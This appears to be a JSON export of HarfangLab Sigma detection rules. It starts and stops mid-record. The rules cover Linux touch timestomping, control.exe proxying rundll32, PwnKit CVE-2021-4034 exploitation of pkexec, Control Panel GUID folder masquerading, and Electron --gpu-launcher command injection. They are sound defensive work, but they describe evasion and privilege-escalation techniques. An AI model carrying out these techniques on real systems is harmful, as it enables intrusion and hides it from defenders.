"content": "title: File Timestamps Altered via touch (Linux)\nid: 4cc44598-022c-4ded-bcf1-b3c0b87f5f6d\ndescription: |\n Detects the use of touch to alter the file's access and modification timestamps.\n This is often used by attacker to allow malicious files to mimic legitimate ones within the same directory.\n It is recommended to investigate the program that ran the touch utility and the files being timestomped to determine if this action was legitimate.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md\n - https://www.mandiant.com/resources/live-off-the-land-an-overview-of-unc1945\n - https://attack.mitre.org/techniques/T1070/006/\ndate: 2021/09/27\nmodified: 2025/10/21\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.006\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/touch'\n ParentImage|contains: '?'\n CommandLine|contains:\n - ' -ac '\n - ' -ca '\n - ' -t '\n - ' -ct '\n - ' -d '\n - ' -cd '\n - ' --date'\n - ' -r '\n - ' -cr '\n - '--reference'\n\n # change only the access time using STAMP\n - ' -at'\n - ' -act'\n - ' -cat'\n # change only the modification time using STAMP\n - ' -mt'\n - ' -mct'\n - ' -cmt'\n # change access and modification times using STAMP\n - ' -amt'\n - ' -mat'\n - ' -amct'\n - ' -mact'\n - ' -camt'\n - ' -cmat'\n - ' -mcat'\n - ' -acmt'\n\n # change only the access time using STRING\n - ' -ad'\n - ' -acd'\n - ' -cad'\n # change only the modification time using STRING\n - ' -md'\n - ' -mcd'\n - ' -cmd'\n # change access and modification times using STRING\n - ' -amd'\n - ' -mad'\n - ' -amcd'\n - ' -macd'\n - ' -camd'\n - ' -cmad'\n - ' -mcad'\n - ' -acmd'\n\n # change only the acess time using reference file\n - ' -ar'\n - ' -acr'\n - ' -car'\n # change only the modification time using reference file\n - ' -mr'\n - ' -mcr'\n - ' -cmr'\n # change access and modification times using reference file\n - ' -amr'\n - ' -mar'\n - ' -amcr'\n - ' -macr'\n - ' -camr'\n - ' -cmar'\n - ' -mcar'\n - ' -acmr'\n\n exclusion_commandline:\n CommandLine|contains:\n - 'touch -t ???????????? /var/opt/data/'\n - 'touch -t ???????????? /var/opt/BESClient/'\n - 'touch -t ???????????? /opt/application/'\n ParentCommandLine|contains:\n - '/sh /usr/libexec/pcp/bin/pmlogger_daily '\n - '/sh /usr/libexec/pcp/bin/pmlogger_check '\n - 'find . -exec touch -'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '|/usr/bin/containerd-shim|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/snap/docker/*/bin/containerd-shim-runc-v2|'\n - '|/opt/BESClient/bin/BESClient'\n - '|/usr/sbin/nrpe|'\n - '|/usr/sbin/crond|'\n\n exclusion_dpkg_postinstall:\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n\n exclusion_mkinitramfs:\n CommandLine|contains: '/var/tmp/mkinitramfs'\n\n exclusion_dracut:\n ParentCommandLine: 'xargs -r -0 touch -h -m -c -r /usr/lib/dracut/dracut-functions.sh'\n\n exclusion_apticron:\n # touch -d 14:32 /var/lib/apticron/cron_run\n CommandLine|contains: '/var/lib/apticron/cron_run'\n ParentCommandLine: '/bin/bash -e /usr/sbin/apticron --cron'\n\n exclusion_pmlogger:\n # touch -t 202205032340 /tmp/pcp.o0BGeJtju/stamp\n CommandLine|contains|all:\n - ' /tmp/pcp.'\n - '/stamp'\n ParentCommandLine|startswith:\n - '/bin/sh /usr/lib/pcp/bin/pmlogger_check -V'\n - '/bin/sh /usr/libexec/pcp/bin/pmlogger'\n\n exclusion_postfix_aliasesdb:\n # touch -r /etc/aliases.db /var/lib/misc/postfix.aliasesdb-stamp\n CommandLine: 'touch -r /etc/aliases.db /var/lib/misc/postfix.aliasesdb-stamp'\n ParentCommandLine: '/bin/bash /usr/libexec/postfix/aliasesdb'\n\n exclusion_golang:\n CommandLine: 'touch -r /usr/lib/go-*/bin/go /usr/lib/go-*/pkg/linux_*'\n ParentCommandLine: 'find /usr/lib/go-*/pkg -exec touch -r /usr/lib/go-*/bin/go {} ;'\n\n exclusion_yocto:\n - ParentImage|startswith:\n - '/opt/yocto/yocto-sdk-zero/'\n - '/opt/yocto/yocto-sdk/'\n - CommandLine|startswith:\n - 'touch -h --date=@* */comhub-poky-linux/'\n - 'touch -h --date=@* /opt/yocto/yocto-sdk-'\n\n exclusion_zabbix:\n - ProcessParentImage:\n - '/usr/bin/zabbix_server'\n - '/usr/sbin/zabbix_server'\n - '/usr/sbin/zabbix_agentd'\n - ProcessGrandparentImage:\n - '/usr/bin/zabbix_server'\n - '/usr/sbin/zabbix_server'\n - '/usr/sbin/zabbix_agentd'\n\n exclusion_make:\n - ParentImage: '/usr/bin/make'\n - Ancestors|contains: '|/usr/bin/make|'\n\n # https://github.com/DSI-Universite-Rennes2/get-partage-logs\n exclusion_get_partage_logs:\n # /bin/bash /usr/local/scripts/get-partage-logs.sh\n # /bin/bash /usr/local/bin/get-partage-logs.sh\n ParentCommandLine|endswith: '/get-partage-logs.sh'\n\n # touch -t 202401172359.59 /tmp/get-partage-logs.ibsbr5/yesterday\n # touch -t 202401172359.59 /tmp/get-partage-logs.apjkrz/yesterday\n CommandLine: 'touch -t * /tmp/get-partage-logs.*/yesterday'\n\n exclusion_envman:\n CommandLine: 'touch -a /home/*/.config/envman/*.env'\n\n exclusion_overgrive:\n GrandparentCommandLine: 'python3 /opt/thefanclub/overgrive/overgrive'\n\n # TODO: Ancestors on yay\n exclusion_makepkg:\n CommandLine: 'touch -d @* .mtree'\n\n # bash -hB /usr/bin/makepkg -F -f --noconfirm --noextract --noprepare --holdver --ignorearch -c\n # /bin/sh /usr/bin/fakeroot -- bash -hB /usr/bin/makepkg -F -f --noconfirm --noextract --noprepare --holdver --ignorearch -c\n # /bin/sh /usr/bin/fakeroot -- bash -hB /usr/bin/makepkg -F -si\n GrandparentCommandLine|contains: '/usr/bin/makepkg'\n\n exclusion_nettoyage:\n ParentCommandLine: '/bin/ksh /develop/dev_sh/nettoyage/vnettoyage.ksh -r'\n\n exclusion_snap:\n CommandLine: 'touch -r /snap/* /home/*/snap/*/.cache/desktop-runtime-date'\n ParentCommandLine|startswith: '/bin/bash /snap/'\n\n exclusion_kitty:\n Ancestors|contains: '|/usr/bin/kitty|'\n CommandLine|endswith: '/.config/envman/function.fish'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4cc44598-022c-4ded-bcf1-b3c0b87f5f6d",
"rule_name": "File Timestamps Altered via touch (Linux)",
"rule_description": "Detects the use of touch to alter the file's access and modification timestamps.\nThis is often used by attacker to allow malicious files to mimic legitimate ones within the same directory.\nIt is recommended to investigate the program that ran the touch utility and the files being timestomped to determine if this action was legitimate.\n",
"rule_creation_date": "2021-09-27",
"rule_modified_date": "2025-10-21",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4d498a18-ea66-4e96-8224-9ee8bdc07f47",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072190Z",
"creation_date": "2026-03-23T11:45:34.072192Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072197Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md",
"https://attack.mitre.org/techniques/T1218/002/"
],
"name": "t1218_002_control_panel_dll_loaded.yml",
"content": "title: Suspicious Control Panel DLL Loaded\nid: 4d498a18-ea66-4e96-8224-9ee8bdc07f47\ndescription: |\n Detects the loading of a suspicious DLL by the control.exe Windows Control Panel binary, which may indicate an attempt to proxy malicious DLL execution through the Windows Control Panel.\n Control.exe is a legitimate Windows system binary that handles the execution of Control Panel items and applets. Rundll32.exe is a Windows utility that loads and executes functions from Dynamic Link Libraries (DLLs). Attackers can use control.exe to spawn rundll32.exe, effectively proxying the execution of malicious DLLs while appearing to originate from a trusted system component.\n It is recommended to investigate the command-line arguments of the rundll32.exe process to identify the specific DLL being loaded, analyze it, and review any network connections or file system modifications made at the time of execution.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md\n - https://attack.mitre.org/techniques/T1218/002/\ndate: 2025/05/13\nmodified: 2025/09/23\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.LOLBin.Rundll32\n - classification.Windows.LOLBin.Control\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection_process:\n - ProcessImage|endswith: '\\rundll32.exe'\n - ProcessOriginalFileName: 'RUNDLL32.EXE'\n\n selection_parent:\n ProcessParentImage|endswith: '\\control.exe'\n\n filter_common_directory:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n - '?:\\windows\\CCM\\'\n - '?:\\Program Files\\'\n - '?:\\program files (x86)\\'\n - '?:\\Windows\\assembly\\NativeImages_'\n - '*\\docker\\windowsfilter\\\\*\\Files\\Windows\\System32\\'\n - '*\\docker\\windowsfilter\\\\*\\Files\\Windows\\Syswow64\\'\n\n filter_signed:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n - 'Windows Phone'\n - 'HarfangLab SAS'\n\n exclusion_rundll32:\n ProcessCommandLine:\n - '?:\\Windows\\system32\\rundll32.exe Shell32.dll,Control_RunDLL ?:\\Windows\\System32\\\\*'\n - '?:\\Windows\\System32\\rundll32.exe ?:\\Windows\\System32\\shell32.dll,Control_RunDLL ?:\\Windows\\System32\\\\*'\n - '?:\\WINDOWS\\system32\\rundll32.exe Shell32.dll,Control_RunDLL ?:\\Windows\\WinSxS\\\\*'\n - '?:\\windows\\system32\\rundll32.exe Shell32.dll,Control_RunDLL ?:\\Program Files\\\\*'\n - '?:\\windows\\system32\\rundll32.exe Shell32.dll,Control_RunDLL ?:\\Program Files (x86)\\\\*'\n - '?:\\windows\\system32\\rundll32.exe Shell32.dll,Control_RunDLL input.dll,,{C07337D3-DB2C-4D0B-9A93-B722A6C106E2}*'\n\n exclusion_dicom:\n ProcessCommandLine: '?:\\Windows\\system32\\rundll32.exe Shell32.dll,Control_RunDLL ?:\\Synapse\\DicomServerCpl.dll'\n\n exclusion_sassafras:\n ImageLoaded: '?:\\Windows\\katrk64.dll'\n Signed: 'true'\n Signature: 'Sassafras Software Inc.'\n\n exclusion_symantec:\n # C:\\ProgramData\\Symantec\\Symantec Endpoint Protection\\14.3.10148.8000.105\\Data\\Sysfer\\x64\\sysfer.dll\n OriginalFileName: 'sysfer.dll'\n Signed: 'true'\n Signature: 'Symantec Corporation'\n\n exclusion_teamviewer:\n # C:\\Users\\xxx\\AppData\\Local\\Temp\\TeamViewer\\tv_x64.dll\n OriginalFileName: 'tv_x64.dll'\n Signed: 'true'\n Signature:\n - 'TeamViewer GmbH'\n - 'TeamViewer Germany GmbH'\n\n exclusion_elo_control_panel:\n OriginalFileName: 'EloControlPanel.cpl'\n Signed: 'true'\n Signature: 'Elo Touch Solutions'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4d498a18-ea66-4e96-8224-9ee8bdc07f47",
"rule_name": "Suspicious Control Panel DLL Loaded",
"rule_description": "Detects the loading of a suspicious DLL by the control.exe Windows Control Panel binary, which may indicate an attempt to proxy malicious DLL execution through the Windows Control Panel.\nControl.exe is a legitimate Windows system binary that handles the execution of Control Panel items and applets. Rundll32.exe is a Windows utility that loads and executes functions from Dynamic Link Libraries (DLLs). Attackers can use control.exe to spawn rundll32.exe, effectively proxying the execution of malicious DLLs while appearing to originate from a trusted system component.\nIt is recommended to investigate the command-line arguments of the rundll32.exe process to identify the specific DLL being loaded, analyze it, and review any network connections or file system modifications made at the time of execution.\n",
"rule_creation_date": "2025-05-13",
"rule_modified_date": "2025-09-23",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4d52ab05-80d6-4522-b240-24cad32c4a0b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088445Z",
"creation_date": "2026-03-23T11:45:34.088447Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088451Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4034",
"https://access.redhat.com/security/cve/CVE-2021-4034",
"https://ubuntu.com/security/CVE-2021-4034",
"https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034",
"https://github.com/berdav/CVE-2021-4034",
"https://attack.mitre.org/techniques/T1548/",
"https://attack.mitre.org/techniques/T1068/"
],
"name": "cve_2021_4034_polkit_pkexec.yml",
"content": "title: Polkit's pkexec CVE-2021-4034 Vulnerability Exploited\nid: 4d52ab05-80d6-4522-b240-24cad32c4a0b\ndescription: |\n Detects a possible exploitation of CVE-2021-4034 in Polkit's pkexec.\n CVE-2021-4034 is a vulnerability within the pkexec binary and can be used by an unprivileged user to obtain root access.\n All major Linux distribution were affected and a proof-of-concept is available publicly.\n It is recommended to investigate the child and parent processes for malicious actions.\nreferences:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4034\n - https://access.redhat.com/security/cve/CVE-2021-4034\n - https://ubuntu.com/security/CVE-2021-4034\n - https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034\n - https://github.com/berdav/CVE-2021-4034\n - https://attack.mitre.org/techniques/T1548/\n - https://attack.mitre.org/techniques/T1068/\ndate: 2022/01/27\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1548\n - attack.t1068\n - cve.2021-4034\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Exploit.CVE-2021-4034\n - classification.Linux.Exploit.Pkexec\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/pkexec'\n CommandLine: ''\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4d52ab05-80d6-4522-b240-24cad32c4a0b",
"rule_name": "Polkit's pkexec CVE-2021-4034 Vulnerability Exploited",
"rule_description": "Detects a possible exploitation of CVE-2021-4034 in Polkit's pkexec.\nCVE-2021-4034 is a vulnerability within the pkexec binary and can be used by an unprivileged user to obtain root access.\nAll major Linux distribution were affected and a proof-of-concept is available publicly.\nIt is recommended to investigate the child and parent processes for malicious actions.\n",
"rule_creation_date": "2022-01-27",
"rule_modified_date": "2025-04-14",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1068",
"attack.t1548"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4d587e21-5699-48e7-8445-551ccb0a9d8b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070710Z",
"creation_date": "2026-03-23T11:45:34.070714Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070721Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/windows/win32/shell/control-panel-applications",
"https://securelist.com/miner-campaign-misuses-open-source-siem-agent/114022/",
"https://attack.mitre.org/techniques/T1036/"
],
"name": "t1036_control_panel_library_load.yml",
"content": "title: Library Loaded from a Folder Masquerading as a Control Panel Item\nid: 4d587e21-5699-48e7-8445-551ccb0a9d8b\ndescription: |\n Detects a process loading a DLL from a folder whose name contains a well-known Control Panel GUID.\n Adversaries may use Control Panel GUIDs to hide their payload as Explorer will open the Control Panel instead of browsing the folder.\n It is recommended to check for malicious activity performed by the process loading the DLL or its parent processes.\nreferences:\n - https://learn.microsoft.com/en-us/windows/win32/shell/control-panel-applications\n - https://securelist.com/miner-campaign-misuses-open-source-siem-agent/114022/\n - https://attack.mitre.org/techniques/T1036/\ndate: 2024/10/23\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.Masquerading\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|contains:\n - '.{0142e4d0-fb7a-11dc-ba4a-000ffe7ab428}\\'\n - '.{025A5937-A6BE-4686-A844-36FE4BEC8B6D}\\'\n - '.{05d7b0f4-2121-4eff-bf6b-ed3f69b894d9}\\'\n - '.{087DA31B-0DD3-4537-8E23-64A18591F88B}\\'\n - '.{0D2A3442-5181-4E3A-9BD4-83BD10AF3D76}\\'\n - '.{0DF44EAA-FF21-4412-828E-260A8728E7F1}\\'\n - '.{1206F5F1-0569-412C-8FEC-3204630DFB70}\\'\n - '.{17cd9488-1228-4b2f-88ce-4298e93e0966}\\'\n - '.{2227A280-3AEA-1069-A2DE-08002B30309D}\\'\n - '.{241D7C96-F8BF-4F85-B01F-E2B043341A4B}\\'\n - '.{36eef7db-88ad-4e81-ad49-0e313f0c35f8}\\'\n - '.{37efd44d-ef8d-41b1-940d-96973a50e9e0}\\'\n - '.{3e7efb4c-faf1-453d-89eb-56026875ef90}\\'\n - '.{4026492F-2F69-46B8-B9BF-5654FC07E423}\\'\n - '.{40419485-C444-4567-851A-2DD7BFA1684D}\\'\n - '.{5224F545-A443-4859-BA23-7B5A95BDC8EF}\\'\n - '.{58E3C745-D971-4081-9034-86E34B30836A}\\'\n - '.{5ea4f148-308c-46d7-98a9-49041b1dd468}\\'\n - '.{60632754-c523-4b62-b45c-4172da012619}\\'\n - '.{62D8ED13-C9D0-4CE8-A914-47DD628FB1B0}\\'\n - '.{67CA7650-96E6-4FDD-BB43-A8E774F73A57}\\'\n - '.{6C8EEC18-8D75-41B2-A177-8831D59D2D50}\\'\n - '.{6DFD7C5C-2451-11d3-A299-00C04F8EF6AF}\\'\n - '.{725BE8F7-668E-4C7B-8F90-46BDB0936430}\\'\n - '.{74246bfc-4c96-11d0-abef-0020af6b0b7a}\\'\n - '.{78CB147A-98EA-4AA6-B0DF-C8681F69341C}\\'\n - '.{78F3955E-3B90-4184-BD14-5397C15F1EFC}\\'\n - '.{7A979262-40CE-46ff-AEEE-7884AC3B6136}\\'\n - '.{7b81be6a-ce2b-4676-a29e-eb907a5126c5}\\'\n - '.{80F3F1D5-FECA-45F3-BC32-752C152E456E}\\'\n - '.{87D66A43-7B11-4A28-9811-C86EE395ACF7}\\'\n - '.{8E0C279D-0BD1-43C3-9EBD-31C3DC5B8A77}\\'\n - '.{8E908FC9-BECC-40f6-915B-F4CA0E70D03D}\\'\n - '.{93412589-74D4-4E4E-AD0E-E0CB621440FD}\\'\n - '.{96AE8D84-A250-4520-95A5-A47A7E3C548B}\\'\n - '.{9C60DE1E-E5FC-40f4-A487-460851A8D915}\\'\n - '.{9C73F5E5-7AE7-4E32-A8E8-8D23B85255BF}\\'\n - '.{9FE63AFD-59CF-4419-9775-ABCC3849F861}\\'\n - '.{A0275511-0E86-4ECA-97C2-ECD8F1221D08}\\'\n - '.{A304259D-52B8-4526-8B1A-A1D6CECC8243}\\'\n - '.{A3DD4F92-658A-410F-84FD-6FBBBEF2FFFE}\\'\n - '.{A8A91A66-3A7D-4424-8D24-04E180695C7A}\\'\n - '.{AB3BE6AA-7561-4838-AB77-ACF8427DF426}\\'\n - '.{B2C761C6-29BC-4f19-9251-E6195265BAF1}\\'\n - '.{B98A2BEA-7D42-4558-8BD1-832F41BAC6FD}\\'\n - '.{BAA884F4-3432-48b8-AA72-9BF20EEF31D5}\\'\n - '.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\\'\n - '.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\\'\n - '.{BE122A0E-4503-11DA-8BDE-F66BAD1E3F3A}\\'\n - '.{BF782CC9-5A52-4A17-806C-2A894FFEEAC5}\\'\n - '.{C555438B-3C23-4769-A71F-B6D3D9B6053A}\\'\n - '.{C58C4893-3BE0-4B45-ABB5-A63E4B8C8651}\\'\n - '.{CB1B7F8C-C50A-4176-B604-9E24DEE8D4D1}\\'\n - '.{D20EA4E1-3957-11d2-A40B-0C5020524153}\\'\n - '.{D450A8A1-9568-45C7-9C0E-B4F9FB4537BD}\\'\n - '.{D555645E-D4F8-4c29-A827-D93C859C4F2A}\\'\n - '.{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}\\'\n - '.{D9EF8727-CAC2-4e60-809E-86F80A666C91}\\'\n - '.{E2E7934B-DCE5-43C4-9576-7FE4F75E7480}\\'\n - '.{E95A4861-D57A-4be1-AD0F-35267E261739}\\'\n - '.{E9950154-C418-419e-A90A-20C5287AE24B}\\'\n - '.{ECDB0924-4208-451E-8EE0-373C0956DE16}\\'\n - '.{ED834ED6-4B5A-4bfe-8F11-A626DCB6A921}\\'\n - '.{F2DDFC82-8F12-4CDD-B7DC-D4FE1425AA4D}\\'\n - '.{F6B6E965-E9B2-444B-9286-10C9152EDBC5}\\'\n - '.{F82DF8F7-8B9F-442E-A48C-818EA735FF9B}\\'\n - '.{F942C606-0914-47AB-BE56-1321B8035096}\\'\n - '.{FCFEECAE-EE1B-4849-AE50-685DCF7717EC}\\'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4d587e21-5699-48e7-8445-551ccb0a9d8b",
"rule_name": "Library Loaded from a Folder Masquerading as a Control Panel Item",
"rule_description": "Detects a process loading a DLL from a folder whose name contains a well-known Control Panel GUID.\nAdversaries may use Control Panel GUIDs to hide their payload as Explorer will open the Control Panel instead of browsing the folder.\nIt is recommended to check for malicious activity performed by the process loading the DLL or its parent processes.\n",
"rule_creation_date": "2024-10-23",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4d721693-c6fd-4568-9bbf-4f9070fd8abe",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072640Z",
"creation_date": "2026-03-23T11:45:34.072643Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072647Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://positive.security/blog/ms-officecmd-rce",
"https://attack.mitre.org/techniques/t1574"
],
"name": "t1574_electron_gpu_launcher.yml",
"content": "title: Electron Application Started with Insecure GPU Settings\nid: 4d721693-c6fd-4568-9bbf-4f9070fd8abe\ndescription: |\n Detects the execution of an Electron-based application (Teams, Skype, etc.) using insecure GPU settings.\n Attackers can use these settings to achieve persistence or perform command injection.\n It is recommended to investigate the parent processes and the execution context, as well as potential malicious actions around this detection, to determine if this actin was legitimate.\nreferences:\n - https://positive.security/blog/ms-officecmd-rce\n - https://attack.mitre.org/techniques/t1574\ndate: 2021/12/17\nmodified: 2025/02/18\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1574\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_app_skype:\n - Image|endswith: '\\skype.exe'\n - OriginalFileName: 'Skype.exe'\n\n selection_app_teams:\n - Image|endswith: '\\Teams.exe'\n - OriginalFileName: 'Teams.exe'\n\n selection_args:\n CommandLine|contains|all:\n - '--disable-gpu-sandbox'\n - '--gpu-launcher'\n\n condition: 1 of selection_app_* and selection_args\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4d721693-c6fd-4568-9bbf-4f9070fd8abe",
"rule_name": "Electron Application Started with Insecure GPU Settings",
"rule_description": "Detects the execution of an Electron-based application (Teams, Skype, etc.) using insecure GPU settings.\nAttackers can use these settings to achieve persistence or perform command injection.\nIt is recommended to investigate the parent processes and the execution context, as well as potential malicious actions around this detection, to determine if this actin was legitimate.\n",
"rule_creation_date": "2021-12-17",
"rule_modified_date": "2025-02-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1574"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4d7c9617-c2ec-4fad-be66-0d0804d9e122",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097610Z",
"creation_date": "2026-03-23T11:45:34.097612Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097617Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/",
